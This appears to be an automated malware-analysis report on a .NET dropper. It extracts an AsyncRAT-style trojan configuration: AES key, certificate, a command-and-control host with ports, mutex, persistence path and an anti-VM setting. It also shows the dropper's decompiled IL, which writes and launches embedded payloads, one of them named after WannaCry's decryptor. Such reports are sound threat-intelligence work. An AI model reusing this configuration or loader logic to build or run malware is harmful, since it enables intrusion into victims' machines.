Symbol Obfuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 23012fdfae8f3a12379e28d91663987c
|
| Sha1 | 94028e31d93a623891495c6070f758e36146e08e
|
| Sha256 | 9ce0019bf338d8ee9c2760d9dd677f6f72aad8de129270b4ab1af51d8f11b710
|
| Sha384 | 109a97c142cb013d5f4410cc07a6deed55840fb1b4aeac295e6c04e16d48702f39ecd7b916baf1bac25d6e0546e4c7c8
|
| Sha512 | 9e44178f7d3fe52f126fa0ae77f6573ae065065c649cb51e4473b99005ea3121654d87dc4b0b899230b9b628b99fd934b593cec0dec39ba065afc1c4629d475a
|
| SSDeep | 98304:8CWgM+Ld3M+primB7+W4p8Jr92iSzzMu7NALVZM:bDZriRWkMr9qklHM
|
| TLSH | 852644E15E7164BDFA5CD96D20A925032A629CBC85D4E48F0CC6ACB0247C7B0DFA1ED7
|
PeID
|
Config. Field0 | Value |
|---|---|
| ref_elem_0x0000000E | World.exe-=>True-=>False |
| ref_elem_0x00000016 | LOR.exe-=>True-=>False |
| ref_elem_0x0000001E | @WanaDecryptor@.exe-=>True-=>False |
| Workpath | %AppData% |
| SPL | -=> |
| Mutex | Pgay2ZuUcpniBLr5U |
|
Config. Field0 | Value |
|---|---|
| Key (AES_256) | aFl0bVBBQm10eXFGZkE5TFYwZm41dGhqcHBhbUhkNWc= |
| Pastebin | - |
| Certificate | MIIE8jCCAtqgAwIBAgIQAOD7cV0bLhEBFPJUOT6P5TANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjYwNTA2MTgwNzQ2WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBALbogjSQruWZ6e0W50t6xywM9nWyeqB6w3E9sv4fVJXMYwr9+6VRn2+Ki0AZeEzTe+wEfgJ4mqX43+hYHMOORcyIlSPFiGT4Mmkr4PFr4j2qkdDWmIXU+8ntHW11259TEzscd4tCXZTcPwxqZvNuzYcHPIRieF+7mwR1Sd8I+vK0sb/6qxyvs4IBmRHvwfMjNQCqAns0/hG9udrcKLOA1VH1THpUs0lqqsOcAus0jQyZ+JBESBzrKlyZLRq+DnP6nHQMZfK5Y/tsNgI+QDZtCOXhRmhV+/75j8jI9jw/M0zfefSRXrgH3EdqyJ1DDJD3opv8jvSD6LjYjV1gSqNESwCysBnlOROWj4TEH9/J1T2xumjHOB+jOHfT1lGVjKt07vJv4sPQmG29cnZkgvX+04awtESinsWd/N3TLSPzQcmCxfcby4mOcA9ENpqxgpbHfnF6iwlMySHUx7Zev7a88+8viNiCgPCiMR+KZ2skp+q4Glv6S1ps+imkvFmpw1Mkzchw88kqNNCNmZfv0iM99TcechVO18QwHQOEgqd5dnrMsCz1wFSG4cTBR2yQIUCbwkp4WLVdTLX9wnXLuAY9/9pPpmVHS5lX1QAkf174nk+q8G7jiC34z5WsQhBPIrbgz0f35PjG7aWnoLCQmrmrA0FfWbSMqJPz8ACnZG1hWV59AgMBAAGjMjAwMB0GA1UdDgQWBBTEvxDfZyOhxLqEqvaD9fMUgotbojAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQBdhNBK8ZWmC6/XFqR6PyP3rCng2FylxxPWwjR0Y28fqDYFCigKuJ47wvF6VrJMD53xeLVODBbpVLHatiZFty39HWlool+VBGOAUoT/ZLuEZngviKIDWQMBJ/VGRj5LbzUV4ewAp4pj5nyjCxyR6NKJInwXo9U9SCENkWZgPP23CBzuoIY6eLaDImIlJdhZy1MEgqZgJInL802g1tt8twM3aAnWOHqd4dynfwnsUbGmiLYEOFDPkwMtV60dm3faknS7zX5FRwcyUpfvT6O3q8CrNOVVxgV1W7llDB8sZ7f8r7a22uVZAGMVUhW8bUVgPJbYPX525ihinHeNGuA+oG4h36Jecb/FRGOud/DkW3A/TfVkP/CD2QI2Zcebc4zdTxplERVtQruP+pIEu5dtFbl1izw0LFQ33v5yTHHYktLSFR6Q3TDIFArSPjDZ+M3E4oWg9uYWaaR0ZN0lluYEtTHdPp8KnVDpI4vUNph1o/Ku00DOeMC0Ji7cT/Gt0RFJwxplVxHJgH5WXhaIbQWqu+pEpRQvaHHPZenIrzklP96bbs92mpS0i2ehhJKJRaTNWl/1ENNE8qTy133E1oqqCrRFp4W2PaavI8FzO1GqUAAATIE8MmbScEWxX8cMCHgoQhMa8/nAIgzIyIr84auhmRQCyCMRCA3rKPAxEY6kYXfYnA== |
| ServerSignature | QpdVABtQJP6N4Ekir/sUnfajiBbZaWUByKP4Z08qD1+4nCVTT/Tw1hXUgqYEsEf5ZR607/D7/XR8aDBVX16zL/RzVctcWItQmwkZQMuMtzWHPQ/VEc7epY4H7+4SOKXFn/FOPAJ4mCyt1Jf96uYvLU+2+/yfyZNYPdjkl9LQ2M7VZcT+1zM/M2gKhVxsFBfvMvEgnBSCSa8wxF92ZBqHPGW0T5KhgWgTxo9XBr9C9hf3ScjaVe8YkwIlwF6BLVtMUaN9H+oqlpOoKHMm6jUIIP+XvSE6+Jv4jLW3242QxEnZ7ehSN7mBexIJoPuCFDfVQeGaLVIFz+reUDfkZLI6xCQil+zOixkstNUNXqEW4ScmV71SlwY/Nz8GP27WRjtZwIAOQql3eLakT5ZMbz5/oClrg2xN0w45LfzCxAxCv499TlagRIq4QhQlaS82VBpt+OFAkFL+FdOOzqMbBx4fsajfPxsNlCHSdt/QhEs1OY47zwoS2BKuYrVwAwndJ+QZE9O8tj/pLhtOZC3zpan7nmDYQy69+OLN8cWEdXPi+DApbPw/pcjgrE72O5B+ShhTMGj1vgN3jjdYIcUdU1jM+OPYLCOHioWOGSbRL3eMqIO64a+XeaXK82VcL27w33xqBi3gBP5/l55kh2I6h8YEtbqymtk1Sx6VrTlCgwyVCJM= |
| Install | true |
| BDOS | true |
| Anti-VM | true |
| Install File | system.exe |
| Install-Folder | %AppData% |
| Version | 0.5.6A |
| Hosts | mestizo.co.com |
| Ports | 80,443,6606,7707,8080,8808 |
| Mutex | mestizo.co.com |
| Delay | 5 |
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | norah.ns.cloudflare.com.exe |
| Full Name | norah.ns.cloudflare.com.exe |
| EntryPoint | System.Void Program::Main() |
| Scope Name | norah.ns.cloudflare.com.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | norah.ns.cloudflare.com |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 12 |
| Main Method | System.Void Program::Main() |
| Main IL Instruction Count | 159 |
| Main IL | ldc.i4.1 <null> stloc.s V_5 call System.Boolean Program::CreateMutex() brtrue.s IL_0013: call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() ldc.i4.2 <null> stloc.s V_5 ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() ldc.i4.1 <null> stloc.3 <null> ldc.i4.5 <null> stloc.s V_5 ldsfld System.Collections.Generic.List`1<System.String> Program::List callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.2 <null> br IL_0130: ldloca.s V_2 ldloca.s V_2 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.0 <null> ldc.i4.6 <null> stloc.s V_5 ldsfld System.String Program::Workpath call System.Object Program::GETP(System.String) ldstr \ call System.Object Microsoft.VisualBasic.CompilerServices.Operators::ConcatenateObject(System.Object,System.Object) ldloc.0 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) ldsfld System.String Program::SPL ldc.i4.m1 <null> ldc.i4.0 <null> call System.String[] Microsoft.VisualBasic.Strings::Split(System.String,System.String,System.Int32,Microsoft.VisualBasic.CompareMethod) ldc.i4.0 <null> ldelem.ref <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::ConcatenateObject(System.Object,System.Object) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stloc.1 <null> ldc.i4.7 <null> stloc.s V_5 ldloc.0 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) ldsfld System.String Program::SPL ldc.i4.m1 <null> ldc.i4.0 <null> call System.String[] Microsoft.VisualBasic.Strings::Split(System.String,System.String,System.Int32,Microsoft.VisualBasic.CompareMethod) ldc.i4.2 <null> ldelem.ref <null> ldstr True ldc.i4.0 <null> call System.Int32 Microsoft.VisualBasic.CompilerServices.Operators::CompareString(System.String,System.String,System.Boolean) ldc.i4.0 <null> bne.un.s IL_00CB: ldc.i4.s 13 ldc.i4.8 <null> stloc.s V_5 ldloc.1 <null> call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_00C9: br.s IL_0123 ldc.i4.s 9 stloc.s V_5 ldloc.1 <null> ldloc.0 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) ldsfld System.String Program::SPL ldc.i4.m1 <null> ldc.i4.0 <null> call System.String[] Microsoft.VisualBasic.Strings::Split(System.String,System.String,System.Int32,Microsoft.VisualBasic.CompareMethod) ldc.i4.0 <null> ldelem.ref <null> call System.Byte[] Program::GetTheResource(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldc.i4.s 10 stloc.s V_5 ldloc.1 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> br.s IL_0123: ldc.i4.s 19 ldc.i4.s 13 stloc.s V_5 ldc.i4.s 14 stloc.s V_5 ldloc.1 <null> ldloc.0 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) ldsfld System.String Program::SPL ldc.i4.m1 <null> ldc.i4.0 <null> call System.String[] Microsoft.VisualBasic.Strings::Split(System.String,System.String,System.Int32,Microsoft.VisualBasic.CompareMethod) ldc.i4.0 <null> ldelem.ref <null> call System.Byte[] Program::GetTheResource(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldc.i4.s 15 stloc.s V_5 ldloc.0 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) ldsfld System.String Program::SPL ldc.i4.m1 <null> ldc.i4.0 <null> call System.String[] Microsoft.VisualBasic.Strings::Split(System.String,System.String,System.Int32,Microsoft.VisualBasic.CompareMethod) ldc.i4.1 <null> ldelem.ref <null> ldstr True ldc.i4.0 <null> call System.Int32 Microsoft.VisualBasic.CompilerServices.Operators::CompareString(System.String,System.String,System.Boolean) ldc.i4.0 <null> bne.un.s IL_0123: ldc.i4.s 19 ldc.i4.s 16 stloc.s V_5 ldloc.1 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldc.i4.s 19 stloc.s V_5 call System.Void System.GC::Collect() ldc.i4.s 20 stloc.s V_5 ldloca.s V_2 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue IL_002D: ldloca.s V_2 ldloca.s V_2 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() leave IL_01F8: ldloc.s V_4 ldloc.s V_4 br.s IL_0156: ldc.i4.0 ldloc.s V_4 ldc.i4.1 <null> add <null> ldc.i4.0 <null> stloc.s V_4 switch dnlib.DotNet.Emit.Instruction[] leave.s IL_01ED: ldc.i4 -2146828237 ldloc.s V_5 stloc.s V_4 ldloc.3 <null> switch dnlib.DotNet.Emit.Instruction[] leave.s IL_01ED: ldc.i4 -2146828237 isinst System.Exception ldnull <null> cgt.un <null> ldloc.3 <null> ldc.i4.0 <null> cgt.un <null> and <null> ldloc.s V_4 ldc.i4.0 <null> ceq <null> and <null> endfilter <null> castclass System.Exception call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) leave.s IL_01B8: ldloc.s V_5 ldc.i4 -2146828237 call System.Exception Microsoft.VisualBasic.CompilerServices.ProjectData::CreateProjectError(System.Int32) throw <null> ldloc.s V_4 brfalse.s IL_0201: ret call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() ret <null> |
| Module Name | norah.ns.cloudflare.com.exe |
| Full Name | norah.ns.cloudflare.com.exe |
| EntryPoint | System.Void Program::Main() |
| Scope Name | norah.ns.cloudflare.com.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | norah.ns.cloudflare.com |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 12 |
| Main Method | System.Void Program::Main() |
| Main IL Instruction Count | 159 |
| Main IL | ldc.i4.1 <null> stloc.s V_5 call System.Boolean Program::CreateMutex() brtrue.s IL_0013: call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() ldc.i4.2 <null> stloc.s V_5 ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() ldc.i4.1 <null> stloc.3 <null> ldc.i4.5 <null> stloc.s V_5 ldsfld System.Collections.Generic.List`1<System.String> Program::List callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.2 <null> br IL_0130: ldloca.s V_2 ldloca.s V_2 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.0 <null> ldc.i4.6 <null> stloc.s V_5 ldsfld System.String Program::Workpath call System.Object Program::GETP(System.String) ldstr \ call System.Object Microsoft.VisualBasic.CompilerServices.Operators::ConcatenateObject(System.Object,System.Object) ldloc.0 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) ldsfld System.String Program::SPL ldc.i4.m1 <null> ldc.i4.0 <null> call System.String[] Microsoft.VisualBasic.Strings::Split(System.String,System.String,System.Int32,Microsoft.VisualBasic.CompareMethod) ldc.i4.0 <null> ldelem.ref <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::ConcatenateObject(System.Object,System.Object) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stloc.1 <null> ldc.i4.7 <null> stloc.s V_5 ldloc.0 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) ldsfld System.String Program::SPL ldc.i4.m1 <null> ldc.i4.0 <null> call System.String[] Microsoft.VisualBasic.Strings::Split(System.String,System.String,System.Int32,Microsoft.VisualBasic.CompareMethod) ldc.i4.2 <null> ldelem.ref <null> ldstr True ldc.i4.0 <null> call System.Int32 Microsoft.VisualBasic.CompilerServices.Operators::CompareString(System.String,System.String,System.Boolean) ldc.i4.0 <null> bne.un.s IL_00CB: ldc.i4.s 13 ldc.i4.8 <null> stloc.s V_5 ldloc.1 <null> call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_00C9: br.s IL_0123 ldc.i4.s 9 stloc.s V_5 ldloc.1 <null> ldloc.0 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) ldsfld System.String Program::SPL ldc.i4.m1 <null> ldc.i4.0 <null> call System.String[] Microsoft.VisualBasic.Strings::Split(System.String,System.String,System.Int32,Microsoft.VisualBasic.CompareMethod) ldc.i4.0 <null> ldelem.ref <null> call System.Byte[] Program::GetTheResource(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldc.i4.s 10 stloc.s V_5 ldloc.1 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> br.s IL_0123: ldc.i4.s 19 ldc.i4.s 13 stloc.s V_5 ldc.i4.s 14 stloc.s V_5 ldloc.1 <null> ldloc.0 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) ldsfld System.String Program::SPL ldc.i4.m1 <null> ldc.i4.0 <null> call System.String[] Microsoft.VisualBasic.Strings::Split(System.String,System.String,System.Int32,Microsoft.VisualBasic.CompareMethod) ldc.i4.0 <null> ldelem.ref <null> call System.Byte[] Program::GetTheResource(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldc.i4.s 15 stloc.s V_5 ldloc.0 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) ldsfld System.String Program::SPL ldc.i4.m1 <null> ldc.i4.0 <null> call System.String[] Microsoft.VisualBasic.Strings::Split(System.String,System.String,System.Int32,Microsoft.VisualBasic.CompareMethod) ldc.i4.1 <null> ldelem.ref <null> ldstr True ldc.i4.0 <null> call System.Int32 Microsoft.VisualBasic.CompilerServices.Operators::CompareString(System.String,System.String,System.Boolean) ldc.i4.0 <null> bne.un.s IL_0123: ldc.i4.s 19 ldc.i4.s 16 stloc.s V_5 ldloc.1 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldc.i4.s 19 stloc.s V_5 call System.Void System.GC::Collect() ldc.i4.s 20 stloc.s V_5 ldloca.s V_2 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue IL_002D: ldloca.s V_2 ldloca.s V_2 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() leave IL_01F8: ldloc.s V_4 ldloc.s V_4 br.s IL_0156: ldc.i4.0 ldloc.s V_4 ldc.i4.1 <null> add <null> ldc.i4.0 <null> stloc.s V_4 switch dnlib.DotNet.Emit.Instruction[] leave.s IL_01ED: ldc.i4 -2146828237 ldloc.s V_5 stloc.s V_4 ldloc.3 <null> switch dnlib.DotNet.Emit.Instruction[] leave.s IL_01ED: ldc.i4 -2146828237 isinst System.Exception ldnull <null> cgt.un <null> ldloc.3 <null> ldc.i4.0 <null> cgt.un <null> and <null> ldloc.s V_4 ldc.i4.0 <null> ceq <null> and <null> endfilter <null> castclass System.Exception call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) leave.s IL_01B8: ldloc.s V_5 ldc.i4 -2146828237 call System.Exception Microsoft.VisualBasic.CompilerServices.ProjectData::CreateProjectError(System.Int32) throw <null> ldloc.s V_4 brfalse.s IL_0201: ret call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() ret <null> |
|
Name0 | Value |
|---|---|
| Key (AES_256) | aFl0bVBBQm10eXFGZkE5TFYwZm41dGhqcHBhbUhkNWc= |
| CnC | mestizo.co.com |
| Ports | 80 |
| Ports | 443 |
| Ports | 6606 |
| Ports | 7707 |
| Ports | 8080 |
| Ports | 8808 |
| Mutex | mestizo.co.com |
|
Config. Field0 | Value |
|---|---|
| ref_elem_0x0000000E | World.exe-=>True-=>False |
| ref_elem_0x00000016 | LOR.exe-=>True-=>False |
| ref_elem_0x0000001E | @WanaDecryptor@.exe-=>True-=>False |
| Workpath | %AppData% |
| SPL | -=> |
| Mutex | Pgay2ZuUcpniBLr5U |
|
Config. Field0 | Value |
|---|---|
| Key (AES_256) | aFl0bVBBQm10eXFGZkE5TFYwZm41dGhqcHBhbUhkNWc= |
| Pastebin | - |
| Certificate | MIIE8jCCAtqgAwIBAgIQAOD7cV0bLhEBFPJUOT6P5TANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjYwNTA2MTgwNzQ2WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBALbogjSQruWZ6e0W50t6xywM9nWyeqB6w3E9sv4fVJXMYwr9+6VRn2+Ki0AZeEzTe+wEfgJ4mqX43+hYHMOORcyIlSPFiGT4Mmkr4PFr4j2qkdDWmIXU+8ntHW11259TEzscd4tCXZTcPwxqZvNuzYcHPIRieF+7mwR1Sd8I+vK0sb/6qxyvs4IBmRHvwfMjNQCqAns0/hG9udrcKLOA1VH1THpUs0lqqsOcAus0jQyZ+JBESBzrKlyZLRq+DnP6nHQMZfK5Y/tsNgI+QDZtCOXhRmhV+/75j8jI9jw/M0zfefSRXrgH3EdqyJ1DDJD3opv8jvSD6LjYjV1gSqNESwCysBnlOROWj4TEH9/J1T2xumjHOB+jOHfT1lGVjKt07vJv4sPQmG29cnZkgvX+04awtESinsWd/N3TLSPzQcmCxfcby4mOcA9ENpqxgpbHfnF6iwlMySHUx7Zev7a88+8viNiCgPCiMR+KZ2skp+q4Glv6S1ps+imkvFmpw1Mkzchw88kqNNCNmZfv0iM99TcechVO18QwHQOEgqd5dnrMsCz1wFSG4cTBR2yQIUCbwkp4WLVdTLX9wnXLuAY9/9pPpmVHS5lX1QAkf174nk+q8G7jiC34z5WsQhBPIrbgz0f35PjG7aWnoLCQmrmrA0FfWbSMqJPz8ACnZG1hWV59AgMBAAGjMjAwMB0GA1UdDgQWBBTEvxDfZyOhxLqEqvaD9fMUgotbojAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQBdhNBK8ZWmC6/XFqR6PyP3rCng2FylxxPWwjR0Y28fqDYFCigKuJ47wvF6VrJMD53xeLVODBbpVLHatiZFty39HWlool+VBGOAUoT/ZLuEZngviKIDWQMBJ/VGRj5LbzUV4ewAp4pj5nyjCxyR6NKJInwXo9U9SCENkWZgPP23CBzuoIY6eLaDImIlJdhZy1MEgqZgJInL802g1tt8twM3aAnWOHqd4dynfwnsUbGmiLYEOFDPkwMtV60dm3faknS7zX5FRwcyUpfvT6O3q8CrNOVVxgV1W7llDB8sZ7f8r7a22uVZAGMVUhW8bUVgPJbYPX525ihinHeNGuA+oG4h36Jecb/FRGOud/DkW3A/TfVkP/CD2QI2Zcebc4zdTxplERVtQruP+pIEu5dtFbl1izw0LFQ33v5yTHHYktLSFR6Q3TDIFArSPjDZ+M3E4oWg9uYWaaR0ZN0lluYEtTHdPp8KnVDpI4vUNph1o/Ku00DOeMC0Ji7cT/Gt0RFJwxplVxHJgH5WXhaIbQWqu+pEpRQvaHHPZenIrzklP96bbs92mpS0i2ehhJKJRaTNWl/1ENNE8qTy133E1oqqCrRFp4W2PaavI8FzO1GqUAAATIE8MmbScEWxX8cMCHgoQhMa8/nAIgzIyIr84auhmRQCyCMRCA3rKPAxEY6kYXfYnA== |
| ServerSignature | QpdVABtQJP6N4Ekir/sUnfajiBbZaWUByKP4Z08qD1+4nCVTT/Tw1hXUgqYEsEf5ZR607/D7/XR8aDBVX16zL/RzVctcWItQmwkZQMuMtzWHPQ/VEc7epY4H7+4SOKXFn/FOPAJ4mCyt1Jf96uYvLU+2+/yfyZNYPdjkl9LQ2M7VZcT+1zM/M2gKhVxsFBfvMvEgnBSCSa8wxF92ZBqHPGW0T5KhgWgTxo9XBr9C9hf3ScjaVe8YkwIlwF6BLVtMUaN9H+oqlpOoKHMm6jUIIP+XvSE6+Jv4jLW3242QxEnZ7ehSN7mBexIJoPuCFDfVQeGaLVIFz+reUDfkZLI6xCQil+zOixkstNUNXqEW4ScmV71SlwY/Nz8GP27WRjtZwIAOQql3eLakT5ZMbz5/oClrg2xN0w45LfzCxAxCv499TlagRIq4QhQlaS82VBpt+OFAkFL+FdOOzqMbBx4fsajfPxsNlCHSdt/QhEs1OY47zwoS2BKuYrVwAwndJ+QZE9O8tj/pLhtOZC3zpan7nmDYQy69+OLN8cWEdXPi+DApbPw/pcjgrE72O5B+ShhTMGj1vgN3jjdYIcUdU1jM+OPYLCOHioWOGSbRL3eMqIO64a+XeaXK82VcL27w33xqBi3gBP5/l55kh2I6h8YEtbqymtk1Sx6VrTlCgwyVCJM= |
| Install | true |
| BDOS | true |
| Anti-VM | true |
| Install File | system.exe |
| Install-Folder | %AppData% |
| Version | 0.5.6A |
| Hosts | mestizo.co.com |
| Ports | 80,443,6606,7707,8080,8808 |
| Mutex | mestizo.co.com |
| Delay | 5 |
|
Name0 | Value | Location |
|---|---|---|
| Key (AES_256) | aFl0bVBBQm10eXFGZkE5TFYwZm41dGhqcHBhbUhkNWc= Malicious |
23012fdfae8f3a12379e28d91663987c > .Net Resources > cszj.Resources > World.exe > World.exe [AES Decoded] |
| CnC | mestizo.co.com Malicious |
23012fdfae8f3a12379e28d91663987c > .Net Resources > cszj.Resources > World.exe > World.exe [AES Decoded] |
| Ports | 80 Malicious |
23012fdfae8f3a12379e28d91663987c > .Net Resources > cszj.Resources > World.exe > World.exe [AES Decoded] |
| Ports | 443 Malicious |
23012fdfae8f3a12379e28d91663987c > .Net Resources > cszj.Resources > World.exe > World.exe [AES Decoded] |
| Ports | 6606 Malicious |
23012fdfae8f3a12379e28d91663987c > .Net Resources > cszj.Resources > World.exe > World.exe [AES Decoded] |
| Ports | 7707 Malicious |
23012fdfae8f3a12379e28d91663987c > .Net Resources > cszj.Resources > World.exe > World.exe [AES Decoded] |
| Ports | 8080 Malicious |
23012fdfae8f3a12379e28d91663987c > .Net Resources > cszj.Resources > World.exe > World.exe [AES Decoded] |
| Ports | 8808 Malicious |
23012fdfae8f3a12379e28d91663987c > .Net Resources > cszj.Resources > World.exe > World.exe [AES Decoded] |
| Mutex | mestizo.co.com Malicious |
23012fdfae8f3a12379e28d91663987c > .Net Resources > cszj.Resources > World.exe > World.exe [AES Decoded] |